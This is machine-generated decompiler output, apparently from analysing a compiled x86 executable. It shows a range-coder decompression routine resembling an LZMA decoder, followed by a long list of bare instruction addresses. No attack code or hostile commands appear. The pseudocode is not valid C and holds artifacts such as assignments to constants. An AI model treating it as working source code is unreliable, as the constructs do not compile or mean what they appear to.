												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                        0x00000000
                                                        0x00406f8c
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406fb5
                                                        0x00406fbf
                                                        0x00000000
                                                        0x00406f92
                                                        0x00406f92
                                                        0x00406f95
                                                        0x00406f99
                                                        0x00406f9c
                                                        0x00406f9f
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa6
                                                        0x00407080
                                                        0x00407080
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x004070be
                                                        0x004070c2
                                                        0x00407122
                                                        0x00407125
                                                        0x0040712a
                                                        0x0040712b
                                                        0x0040712d
                                                        0x0040712f
                                                        0x00407132
                                                        0x0040703e
                                                        0x0040703e
                                                        0x0040703e
                                                        0x004067da
                                                        0x004067da
                                                        0x004067da
                                                        0x004067e3
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x00000000
                                                        0x004067f4
                                                        0x00000000
                                                        0x00000000
                                                        0x004067fd
                                                        0x00406800
                                                        0x00406803
                                                        0x00406807
                                                        0x00000000
                                                        0x00000000
                                                        0x0040680d
                                                        0x00406810
                                                        0x00406812
                                                        0x00406813
                                                        0x00406816
                                                        0x00406818
                                                        0x00406819
                                                        0x0040681b
                                                        0x0040681e
                                                        0x00406823
                                                        0x00406828
                                                        0x00406831
                                                        0x00406844
                                                        0x00406847
                                                        0x00406853
                                                        0x0040687b
                                                        0x0040687d
                                                        0x0040688b
                                                        0x0040688b
                                                        0x0040688f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040687f
                                                        0x0040687f
                                                        0x00406882
                                                        0x00406883
                                                        0x00406883
                                                        0x00000000
                                                        0x0040687f
                                                        0x00406859
                                                        0x0040685e
                                                        0x0040685e
                                                        0x00406867
                                                        0x0040686f
                                                        0x00406872
                                                        0x00000000
                                                        0x00406878
                                                        0x00406878
                                                        0x00000000
                                                        0x00406878
                                                        0x00000000
                                                        0x00406895
                                                        0x00406895
                                                        0x00406899
                                                        0x00407145
                                                        0x00000000
                                                        0x00407145
                                                        0x004068a2
                                                        0x004068b2
                                                        0x004068b5
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068bb
                                                        0x004068bf
                                                        0x00000000
                                                        0x00000000
                                                        0x004068c1
                                                        0x004068c7
                                                        0x004068f1
                                                        0x004068f7
                                                        0x004068fe
                                                        0x00000000
                                                        0x004068fe
                                                        0x004068cd
                                                        0x004068d0
                                                        0x004068d5
                                                        0x004068d5
                                                        0x004068e0
                                                        0x004068e8
                                                        0x004068eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406930
                                                        0x00406936
                                                        0x00406939
                                                        0x00406946
                                                        0x0040694e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406905
                                                        0x00406905
                                                        0x00406909
                                                        0x00407154
                                                        0x00000000
                                                        0x00407154
                                                        0x00406915
                                                        0x00406920
                                                        0x00406920
                                                        0x00406920
                                                        0x00406923
                                                        0x00406926
                                                        0x00406929
                                                        0x0040692e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00407013
                                                        0x00407017
                                                        0x004071c6
                                                        0x00000000
                                                        0x004071c6
                                                        0x00407023
                                                        0x0040702a
                                                        0x00407032
                                                        0x00407035
                                                        0x00407038
                                                        0x00407038
                                                        0x00000000
                                                        0x00000000
                                                        0x00406956
                                                        0x00406958
                                                        0x0040695b
                                                        0x004069cc
                                                        0x004069cf
                                                        0x004069d2
                                                        0x004069d9
                                                        0x004069e3
                                                        0x00000000
                                                        0x004069e3
                                                        0x0040695d
                                                        0x00406961
                                                        0x00406964
                                                        0x00406966
                                                        0x00406969
                                                        0x0040696c
                                                        0x0040696e
                                                        0x00406971
                                                        0x00406973
                                                        0x00406978
                                                        0x0040697b
                                                        0x0040697e
                                                        0x00406982
                                                        0x00406989
                                                        0x0040698c
                                                        0x00406993
                                                        0x00406997
                                                        0x0040699f
                                                        0x0040699f
                                                        0x0040699f
                                                        0x00406999
                                                        0x00406999
                                                        0x00406999
                                                        0x0040698e
                                                        0x0040698e
                                                        0x0040698e
                                                        0x004069a3
                                                        0x004069a6
                                                        0x004069c4
                                                        0x004069c6
                                                        0x00000000
                                                        0x004069a8
                                                        0x004069a8
                                                        0x004069ab
                                                        0x004069ae
                                                        0x004069b1
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b6
                                                        0x004069b9
                                                        0x004069bb
                                                        0x004069bc
                                                        0x004069bf
                                                        0x00000000
                                                        0x004069bf
                                                        0x00000000
                                                        0x00406bf5
                                                        0x00406bf9
                                                        0x00406c17
                                                        0x00406c1a
                                                        0x00406c21
                                                        0x00406c24
                                                        0x00406c27
                                                        0x00406c2a
                                                        0x00406c2d
                                                        0x00406c30
                                                        0x00406c32
                                                        0x00406c39
                                                        0x00406c3a
                                                        0x00406c3c
                                                        0x00406c3f
                                                        0x00406c42
                                                        0x00406c45
                                                        0x00406c45
                                                        0x00406c4a
                                                        0x00000000
                                                        0x00406c4a
                                                        0x00406bfb
                                                        0x00406bfe
                                                        0x00406c01
                                                        0x00406c0b
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c5f
                                                        0x00406c63
                                                        0x00406c86
                                                        0x00406c89
                                                        0x00406c8c
                                                        0x00406c96
                                                        0x00406c65
                                                        0x00406c65
                                                        0x00406c68
                                                        0x00406c6b
                                                        0x00406c6e
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00406c7e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ca2
                                                        0x00406ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cac
                                                        0x00406cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cb6
                                                        0x00406cb8
                                                        0x00406cbc
                                                        0x00406cbc
                                                        0x00406cbf
                                                        0x00406cc3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d13
                                                        0x00406d17
                                                        0x00406d1e
                                                        0x00406d21
                                                        0x00406d24
                                                        0x00406d2e
                                                        0x00000000
                                                        0x00406d2e
                                                        0x00406d19
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d3a
                                                        0x00406d3e
                                                        0x00406d45
                                                        0x00406d48
                                                        0x00406d4b
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00406d54
                                                        0x00406d54
                                                        0x00406d57
                                                        0x00406d5a
                                                        0x00406d5d
                                                        0x00406d5d
                                                        0x00406d60
                                                        0x00406d67
                                                        0x00406d6c
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dfa
                                                        0x00406dfa
                                                        0x00406dfe
                                                        0x0040719c
                                                        0x00000000
                                                        0x0040719c
                                                        0x00406e04
                                                        0x00406e07
                                                        0x00406e0a
                                                        0x00406e0e
                                                        0x00406e11
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e1c
                                                        0x00406e1f
                                                        0x00000000
                                                        0x00000000
                                                        0x004069ef
                                                        0x004069ef
                                                        0x004069f3
                                                        0x00407160
                                                        0x00000000
                                                        0x00407160
                                                        0x004069f9
                                                        0x004069fc
                                                        0x004069ff
                                                        0x00406a03
                                                        0x00406a06
                                                        0x00406a0c
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a11
                                                        0x00406a14
                                                        0x00406a14
                                                        0x00406a17
                                                        0x00406a1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a20
                                                        0x00406a26
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a2c
                                                        0x00406a2c
                                                        0x00406a30
                                                        0x00406a33
                                                        0x00406a36
                                                        0x00406a39
                                                        0x00406a3c
                                                        0x00406a3d
                                                        0x00406a40
                                                        0x00406a42
                                                        0x00406a48
                                                        0x00406a4b
                                                        0x00406a4e
                                                        0x00406a51
                                                        0x00406a54
                                                        0x00406a57
                                                        0x00406a5a
                                                        0x00406a76
                                                        0x00406a79
                                                        0x00406a7c
                                                        0x00406a7f
                                                        0x00406a86
                                                        0x00406a8a
                                                        0x00406a8c
                                                        0x00406a90
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a60
                                                        0x00406a68
                                                        0x00406a6d
                                                        0x00406a6f
                                                        0x00406a71
                                                        0x00406a71
                                                        0x00406a93
                                                        0x00406a9a
                                                        0x00406a9d
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa8
                                                        0x00406aa8
                                                        0x00406aac
                                                        0x0040716c
                                                        0x00000000
                                                        0x0040716c
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab8
                                                        0x00406abc
                                                        0x00406abf
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406aca
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406ad3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ad5
                                                        0x00406ad8
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406ae1
                                                        0x00406ae4
                                                        0x00406ae7
                                                        0x00406aea
                                                        0x00406aed
                                                        0x00406af0
                                                        0x00406af3
                                                        0x00406b0b
                                                        0x00406b0e
                                                        0x00406b11
                                                        0x00406b14
                                                        0x00406b14
                                                        0x00406b17
                                                        0x00406b1b
                                                        0x00406b1d
                                                        0x00406af5
                                                        0x00406af5
                                                        0x00406afd
                                                        0x00406b02
                                                        0x00406b04
                                                        0x00406b06
                                                        0x00406b06
                                                        0x00406b20
                                                        0x00406b27
                                                        0x00406b2a
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00406b2a
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b6c
                                                        0x00406b6c
                                                        0x00406b70
                                                        0x00407178
                                                        0x00000000
                                                        0x00407178
                                                        0x00406b76
                                                        0x00406b79
                                                        0x00406b7c
                                                        0x00406b80
                                                        0x00406b83
                                                        0x00406b89
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8e
                                                        0x00406b91
                                                        0x00406b91
                                                        0x00406b97
                                                        0x00406b35
                                                        0x00406b35
                                                        0x00406b38
                                                        0x00000000
                                                        0x00406b38
                                                        0x00406b99
                                                        0x00406b99
                                                        0x00406b9c
                                                        0x00406b9f
                                                        0x00406ba2
                                                        0x00406ba5
                                                        0x00406ba8
                                                        0x00406bab
                                                        0x00406bae
                                                        0x00406bb1
                                                        0x00406bb4
                                                        0x00406bb7
                                                        0x00406bcf
                                                        0x00406bd2
                                                        0x00406bd5
                                                        0x00406bd8
                                                        0x00406bd8
                                                        0x00406bdb
                                                        0x00406bdf
                                                        0x00406be1
                                                        0x00406bb9
                                                        0x00406bb9
                                                        0x00406bc1
                                                        0x00406bc6
                                                        0x00406bc8
                                                        0x00406bca
                                                        0x00406bca
                                                        0x00406be4
                                                        0x00406beb
                                                        0x00406bee
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406e7d
                                                        0x00406e7d
                                                        0x00406e81
                                                        0x004071a8
                                                        0x00000000
                                                        0x004071a8
                                                        0x00406e87
                                                        0x00406e8a
                                                        0x00406e8d
                                                        0x00406e91
                                                        0x00406e94
                                                        0x00406e9a
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c4d
                                                        0x00406c4d
                                                        0x00406c50
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00407049
                                                        0x0040704d
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x00407072
                                                        0x00407079
                                                        0x00000000
                                                        0x00407079
                                                        0x0040704f
                                                        0x00407052
                                                        0x00407055
                                                        0x00407058
                                                        0x0040705f
                                                        0x00000000
                                                        0x00000000
                                                        0x0040713a
                                                        0x0040713d
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d74
                                                        0x00406d76
                                                        0x00406d7d
                                                        0x00406d7e
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d8b
                                                        0x00406d8e
                                                        0x00406d91
                                                        0x00406d93
                                                        0x00406d95
                                                        0x00406d95
                                                        0x00406d96
                                                        0x00406d99
                                                        0x00406da0
                                                        0x00406da3
                                                        0x00406db1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00407096
                                                        0x00407096
                                                        0x0040709a
                                                        0x004071d2
                                                        0x00000000
                                                        0x004071d2
                                                        0x004070a0
                                                        0x004070a3
                                                        0x004070a6
                                                        0x004070aa
                                                        0x004070ad
                                                        0x004070b3
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b8
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x00000000
                                                        0x00000000
                                                        0x00406db9
                                                        0x00406dbc
                                                        0x00406df2
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f25
                                                        0x00406f25
                                                        0x00406f28
                                                        0x00406f2a
                                                        0x004071b4
                                                        0x00000000
                                                        0x004071b4
                                                        0x00406f30
                                                        0x00406f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f39
                                                        0x00406f3d
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00000000
                                                        0x00406f40
                                                        0x00406dbe
                                                        0x00406dc0
                                                        0x00406dc2
                                                        0x00406dc4
